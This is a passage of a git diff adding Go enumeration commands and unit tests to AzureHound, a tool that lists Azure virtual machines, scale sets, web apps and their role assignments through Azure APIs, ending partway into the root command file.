0000000..8dd7ff2 --- /dev/null +++ b/cmd/list-virtual-machine-user-access-admins_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineUserAccessAdmins(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listVirtualMachineUserAccessAdmins(ctx, mockVMRoleAssignmentsChannel) + + go func() { + defer close(mockVMRoleAssignmentsChannel) + + mockVMRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZVMRoleAssignment, + models.VirtualMachineRoleAssignments{ + VirtualMachineId: "foo", + RoleAssignments: []models.VirtualMachineRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.UserAccessAdminRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.UserAccessAdminRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-virtual-machine-vmcontributors.go b/cmd/list-virtual-machine-vmcontributors.go new file mode 100644 index 0000000..b89e04f --- /dev/null +++ b/cmd/list-virtual-machine-vmcontributors.go @@ -0,0 +1,81 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineVMContributorsCmd) +} + +var listVirtualMachineVMContributorsCmd = &cobra.Command{ + Use: "virtual-machine-vmcontributors", + Long: "Lists Azure Virtual Machine VMContributors", + Run: listVirtualMachineVMContributorsCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineVMContributorsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine vmcontributors...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + vms := listVirtualMachines(ctx, azClient, subscriptions) + vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listVirtualMachineVMContributors(ctx, vmRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineVMContributors( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.VirtualMachineContributorRoleID)) + vmContributors := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineVMContributor { + return models.VirtualMachineVMContributor{ + VirtualMachineId: ra.VirtualMachineId, + VMContributor: ra.RoleAssignment, + } + }) + return NewAzureWrapper(enums.KindAZVMVMContributor, models.VirtualMachineVMContributors{ + VirtualMachineId: ra.Data.VirtualMachineId, + VMContributors: vmContributors, + }) + }) +} diff --git a/cmd/list-virtual-machine-vmcontributors_test.go b/cmd/list-virtual-machine-vmcontributors_test.go new file mode 100644 index 0000000..8075d29 --- /dev/null +++ b/cmd/list-virtual-machine-vmcontributors_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineVMContributors(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listVirtualMachineVMContributors(ctx, mockVMRoleAssignmentsChannel) + + go func() { + defer close(mockVMRoleAssignmentsChannel) + + mockVMRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZVMRoleAssignment, + models.VirtualMachineRoleAssignments{ + VirtualMachineId: "foo", + RoleAssignments: []models.VirtualMachineRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.VirtualMachineContributorRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.VirtualMachineContributorRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-virtual-machines.go b/cmd/list-virtual-machines.go new file mode 100644 index 0000000..c0cc6ef --- /dev/null +++ b/cmd/list-virtual-machines.go @@ -0,0 +1,127 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachinesCmd) +} + +var listVirtualMachinesCmd = &cobra.Command{ + Use: "virtual-machines", + Long: "Lists Azure Virtual Machines", + Run: listVirtualMachinesCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachinesCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machines...") + start := time.Now() + stream := listVirtualMachines(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachines(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating virtual machines", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureVirtualMachines(ctx, id, query.RMParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing virtual machines for this subscription", "subscriptionId", id) + } else { + virtualMachine := models.VirtualMachine{ + VirtualMachine: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: item.Ok.ResourceGroupId(), + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found virtual machine", "virtualMachine", virtualMachine) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZVM, + Data: virtualMachine, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing virtual machines", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all virtual machines") + }() + + return out +} diff --git a/cmd/list-virtual-machines_test.go b/cmd/list-virtual-machines_test.go new file mode 100644 index 0000000..b955d84 --- /dev/null +++ b/cmd/list-virtual-machines_test.go @@ -0,0 +1,109 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachines(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockSubscriptionsChannel := make(chan interface{}) + mockVirtualMachineChannel := make(chan client.AzureResult[azure.VirtualMachine]) + mockVirtualMachineChannel2 := make(chan client.AzureResult[azure.VirtualMachine]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureVirtualMachines(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockVirtualMachineChannel).Times(1) + mockClient.EXPECT().ListAzureVirtualMachines(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockVirtualMachineChannel2).Times(1) + channel := listVirtualMachines(ctx, mockClient, mockSubscriptionsChannel) + + go func() { + defer close(mockSubscriptionsChannel) + mockSubscriptionsChannel <- AzureWrapper{ + Data: models.Subscription{}, + } + mockSubscriptionsChannel <- AzureWrapper{ + Data: models.Subscription{}, + } + }() + go func() { + defer close(mockVirtualMachineChannel) + mockVirtualMachineChannel <- client.AzureResult[azure.VirtualMachine]{ + Ok: azure.VirtualMachine{}, + } + mockVirtualMachineChannel <- client.AzureResult[azure.VirtualMachine]{ + Ok: azure.VirtualMachine{}, + } + }() + go func() { + defer close(mockVirtualMachineChannel2) + mockVirtualMachineChannel2 <- client.AzureResult[azure.VirtualMachine]{ + Ok: azure.VirtualMachine{}, + } + mockVirtualMachineChannel2 <- client.AzureResult[azure.VirtualMachine]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.VirtualMachine); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.VirtualMachine{}) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.VirtualMachine); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.VirtualMachine{}) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.VirtualMachine); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.VirtualMachine{}) + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-vm-scale-set-role-assignments.go b/cmd/list-vm-scale-set-role-assignments.go new file mode 100644 index 0000000..343354e --- /dev/null +++ b/cmd/list-vm-scale-set-role-assignments.go @@ -0,0 +1,141 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVMScaleSetRoleAssignment) +} + +var listVMScaleSetRoleAssignment = &cobra.Command{ + Use: "vm-scale-set-role-assignments", + Long: "Lists Azure VM Scale Set Role Assignments", + Run: listVMScaleSetRoleAssignmentImpl, + SilenceUsage: true, +} + +func listVMScaleSetRoleAssignmentImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure vm scale set role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listVMScaleSetRoleAssignments(ctx, azClient, listVMScaleSets(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listVMScaleSetRoleAssignments(ctx context.Context, client client.AzureClient, vmScaleSets <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), vmScaleSets) { + if vmScaleSet, ok := result.(AzureWrapper).Data.(models.VMScaleSet); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating vm scale set role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, vmScaleSet.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + vmScaleSetRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this vm scale set", "vmScaleSetId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + vmScaleSetRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("found vm scale set role assignment", "vmScaleSetRoleAssignment", vmScaleSetRoleAssignment) + count++ + vmScaleSetRoleAssignments.RoleAssignments = append(vmScaleSetRoleAssignments.RoleAssignments, vmScaleSetRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZVMScaleSetRoleAssignment, + Data: vmScaleSetRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing vm scale set role assignments", "vmScaleSetId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all vm scale set role assignments") + }() + + return out +} diff --git a/cmd/list-vm-scale-sets.go b/cmd/list-vm-scale-sets.go new file mode 100644 index 0000000..e4c42e8 --- /dev/null +++ b/cmd/list-vm-scale-sets.go @@ -0,0 +1,132 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVMScaleSetsCmd) +} + +var listVMScaleSetsCmd = &cobra.Command{ + Use: "vm-scale-sets", + Long: "Lists Azure Virtual Machine Scale Sets", + Run: listVMScaleSetsCmdImpl, + SilenceUsage: true, +} + +func listVMScaleSetsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure virtual machine scale sets...") + start := time.Now() + stream := listVMScaleSets(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } + +} + +func listVMScaleSets(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating virtual machine scale sets", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureVMScaleSets(ctx, id) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing virtual machine scale sets for this subscription", "subscriptionId", id) + } else { + vmScaleSet := models.VMScaleSet{ + VMScaleSet: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: item.Ok.ResourceGroupId(), + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found virtual machine scale set", "vmScaleSet", vmScaleSet) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZVMScaleSet, + Data: vmScaleSet, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing virtual machine scale sets", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all virtual machine scale sets") + }() + + return out +} diff --git a/cmd/list-web-app-role-assignments.go b/cmd/list-web-app-role-assignments.go new file mode 100644 index 0000000..a694928 --- /dev/null +++ b/cmd/list-web-app-role-assignments.go @@ -0,0 +1,141 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listWebAppRoleAssignment) +} + +var listWebAppRoleAssignment = &cobra.Command{ + Use: "web-app-role-assignments", + Long: "Lists Azure Web App Role Assignments", + Run: listWebAppRoleAssignmentImpl, + SilenceUsage: true, +} + +func listWebAppRoleAssignmentImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure web app role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listWebAppRoleAssignments(ctx, azClient, listWebApps(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listWebAppRoleAssignments(ctx context.Context, client client.AzureClient, webApps <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), webApps) { + if webApp, ok := result.(AzureWrapper).Data.(models.WebApp); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating web app role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, webApp.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + webAppRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this web app", "webAppId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + webAppRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("Found web app role asignment", "webAppRoleAssignment", webAppRoleAssignment) + count++ + webAppRoleAssignments.RoleAssignments = append(webAppRoleAssignments.RoleAssignments, webAppRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZWebAppRoleAssignment, + Data: webAppRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing web app role assignments", "webAppId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all web app role assignments") + }() + + return out +} diff --git a/cmd/list-web-apps.go b/cmd/list-web-apps.go new file mode 100644 index 0000000..dd8a845 --- /dev/null +++ b/cmd/list-web-apps.go @@ -0,0 +1,134 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listWebAppsCmd) +} + +var listWebAppsCmd = &cobra.Command{ + Use: "web-apps", + Long: "Lists Azure Web Apps", + Run: listWebAppsCmdImpl, + SilenceUsage: true, +} + +func listWebAppsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure web apps...") + start := time.Now() + stream := listWebApps(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listWebApps(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating web apps", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureWebApps(ctx, id) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing web apps for this subscription", "subscriptionId", id) + } else { + webApp := models.WebApp{ + WebApp: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: item.Ok.ResourceGroupId(), + ResourceGroupName: item.Ok.ResourceGroupName(), + TenantId: client.TenantInfo().TenantId, + } + if webApp.Kind == "app" { + log.V(2).Info("found web app", "webApp", webApp) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZWebApp, + Data: webApp, + }); !ok { + return + } + } + } + } + log.V(1).Info("finished listing web apps", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all web apps") + }() + + return out +} diff --git a/cmd/root.go b/cmd/root.go new file mode 100644 index 0000000..aa99259 --- /dev/null +++ b/cmd/root.go @@ -0,0 +1,47 @@ +// Copyright (C) 2022 Specter 